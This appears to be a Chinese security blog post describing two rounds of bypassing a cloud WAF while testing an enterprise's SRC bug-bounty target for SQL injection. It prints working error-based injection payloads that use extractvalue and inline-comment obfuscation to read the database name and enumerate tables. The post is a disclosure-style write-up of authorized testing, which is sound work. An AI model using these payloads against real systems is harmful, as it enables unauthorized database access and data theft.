前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >某企业SRC的两次WAF的对抗

某企业SRC的两次WAF的对抗

作者头像
OneTS安全团队
发布于 2025-02-07 08:43:13
发布于 2025-02-07 08:43:13
780
举报
文章被收录于专栏:OneTS安全团队OneTS安全团队

声明

本文属于OneTS安全团队成员carrypan的原创文章,转载请声明出处!本文章仅用于学习交流使用,因利用此文信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,OneTS安全团队及文章作者不为此承担任何责任。

0x00 第一回合

日常抓包,点点点,抓到如下请求与响应,一眼看上去也太像sql注入了

等号换成like可以初步绕过,但是服务端没有返回数据

疯狂尝试,都没戏,目光转移到orderBy参数处,但结果也一样,最后放置了一段时间,回过头来仔细分析了下,将注意点放在filters参数里

"filters":[["loginName","like","%%' and '1'like'1"]]

Filters里有三个数据,盲猜第一个是列名,第二个是运算符,第三个是数值

数值那块尝试了,有某云WAF,暂无法利用,将目光转向运算符位置

脑补以下参数拼接场景

loginName like '%%'

那么直接拼接到运算符处呢?结果服务端返回了正确的数据

继续拼接SQL语句,证明SQL注入

成功

失败

好神奇,WAF竟然不拦截了,典型的盲注,最终结果

0x01 第二回合

之前的poc被拦了

经过一段时间的摸索,发现系统存在异常日志记录,比如

系统异常日志记录如下

有回显的,首先想到报错注入,经尝试发现空格、关键字会被waf识别,直接内联注释绕过,最终poc如下

like'%admin%'and(extractvalue/*!50000*/(1,concat/*!50000*/(0x7e,database())))or

执行完poc,去系统异常日志查看执行结果,获取库名:meeting

注表名

like'%admin%'and(extractvalue/*!50000*/(1,concat/*!50000*/(0x7e,(/*!50000select*/table_name/*!50000from*/(/*!50000information_schema.tables*/)/*!50000where*//*!50000table_schema*/='meeting' limit 0,1))))or

借助burp批量跑表名

193个表,看到用户表sys_person,盲猜存在password字段

密码应该是32位md5加密的,src规则仅提供获取数据证明即可,点到为止。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-12-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 OneTS安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
MySQL手工注入学习-1
页面提示:Please input the ID as parameter with numeric value
Mirror王宇阳
2020/11/12
1.4K0
Sqli-labs 通关笔记
常用报错函数:updatexml(), extractvalue(), floor() 十种MySQL报错注入 【SQL注入】报错注入姿势总结
wywwzjj
2023/05/09
5260
sql注入总结笔记
前端构造的SQL语句片段拼接到后台SQL语句中,后台缺乏正确识别和过滤,造成与其外的数据库查询结果。
宸寰客
2020/08/11
1.7K0
sql注入总结笔记
SQL注入(入门)
收到请求的后端PHP代码会将GET方式传入的id=1与前面的SQL查询语句进行拼接,最后传给执行MySQL的查询语句如下:
Andromeda
2022/10/27
2.1K0
SQL注入(入门)
我的wafBypass之道
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。
用户1467662
2019/04/19
3K0
我的wafBypass之道
科普基础 | 这可能是最全的SQL注入总结,不来看看吗
2.ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名,ACCESS没有注释
HACK学习
2019/11/14
5.2K0
老司机带你过常规WAF
0x00 前言 最近看了不少关于WAF绕过的文章,想把理论深化到实践当中去,于是就有了您正在看的这篇文章,这篇文章分为两大部分,分别写的是SQL注入相关的WAF绕过和一句话木马免杀相关的WAF绕过,本文用来做测试的WAF是安全狗(4.0最新版),在一句话木马免杀的章节也会提到一些绕过D盾的技巧。 0x01 绕过安全狗继续SQL注入 其实说白了,绕过WAF就是混淆你的SQL语句,让它以另一种方式呈现出来,以绕过WAF的黑名单正则表达式匹配,至于具体的混淆方法,网络上有很多的文章已经讲的够详细了,在这里我就直接
ChaMd5安全团队
2018/03/29
1.6K1
老司机带你过常规WAF
Pikachu漏洞靶场系列之SQL
在Owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Naraku
2021/07/29
1.2K0
Pikachu漏洞靶场系列之SQL
sql注入学习总结
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
信安之路
2018/08/08
8650
sql注入学习总结
web安全学习笔记(不定时更新)
在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。
ph0ebus
2023/05/16
1.9K0
web安全学习笔记(不定时更新)
SQL注入头脑风暴
union语句是一下可以查询两条语句的用法,需要注意的是前一句查询语句与后一句查询语句中查询的数量需要保持一直,否则会报错。
Tommonkey
2023/03/20
6840
SQL注入头脑风暴
AI 帮我绕 WAF 之实战案例
AI 在代码阅读领域无人能及,我们要做的就是如何利用好 AI,借助它的能力来完成我们的工作,突发奇想,能否让 AI 帮我构造漏洞利用的 POC 呢?
信安之路
2025/06/09
630
AI 帮我绕 WAF 之实战案例
SQL注入的常规思路及奇葩技巧
最近在看《SQL注入攻击与防御》这本书,看了之后感觉自己之前的视野和格局还是太小了些。SQLi的应用特别广泛,多种web数据库不说,移动安卓端也存在通用的SQLi。而从语言的角度来看~PHP/JAVA/PYTHON/C#等等~都可以与SQLi联系起来,由语言特性而衍生的SQLi种类。最近还听说Javascript也能写后端了,着实把我高兴坏了,看来PHP这“世界上最好的语言”的称号,要换主了~ 同是弱类型语言,这俩哥们怕是要一绝“高低”。
信安之路
2018/08/08
1.6K0
SQL注入的常规思路及奇葩技巧
CTF考点总结-sql注入篇
mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码
黑伞安全
2020/07/28
3.1K0
CTF考点总结-sql注入篇
MySQL注入--Payload
floor和group by配合使用group by的key唯一性和编码顺序导致二次执行产生不同大的key
Mirror王宇阳
2020/11/12
2.6K0
MySQL注入--Payload
复习 - SQL注入
场景:网站A无注入点,网站B存在MySQL注入,且网站AB使用同一数据库。此时可利用网站B的注入点跨库查询获取网站A的数据。
Naraku
2021/07/28
1K0
SQL注入原理及代码分析(一)
我们都知道,学安全,懂SQL注入是重中之重,因为即使是现在SQL注入漏洞依然存在,只是相对于之前现在挖SQL注入变的困难了。而且知识点比较多,所以在这里总结一下。通过构造有缺陷的代码,来理解常见的几种SQL注入。本文只是讲解几种注入原理,没有详细的利用过程。 如果想要了解Access的详细手工注入过程,可以看我的这篇文章https://www.cnblogs.com/lxfweb/p/12643011.html 如果想要了解MySQL的详细手工注入过程,可以看我的这篇文章https://www.cnblogs.com/lxfweb/p/12655316.html 如果想要了解SQL server的详细手工注入过程,可以看我的这篇文章https://www.cnblogs.com/lxfweb/p/12675023.html
雪痕@
2020/09/27
9790
SQL注入原理及代码分析(一)
SQL注入攻击与防御
在动态网站中,往往需要用户传递参数到服务器,这些参数往往需要和数据库进行交互;当服务端没有对参数进行安全过滤时,攻击者在参数中加入恶意的SQL语句结构,便编造成了SQL注入漏洞.
婷婷的橙子
2020/11/02
8K0
SQL注入攻击与防御
sql注入漏洞
第二个参数要求是xpath格式的字符串,语法正确是会按照路径 /该xml文件/要查询的字符串 进行查询
h3110_w0r1d
2024/02/19
2990
sql注入漏洞
bwapp之sql注入_sql注入语句入门
0x0E、SQL Injection – Blind – Boolean-Based
全栈程序员站长
2022/11/09
8.6K0
bwapp之sql注入_sql注入语句入门
相关推荐
MySQL手工注入学习-1
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档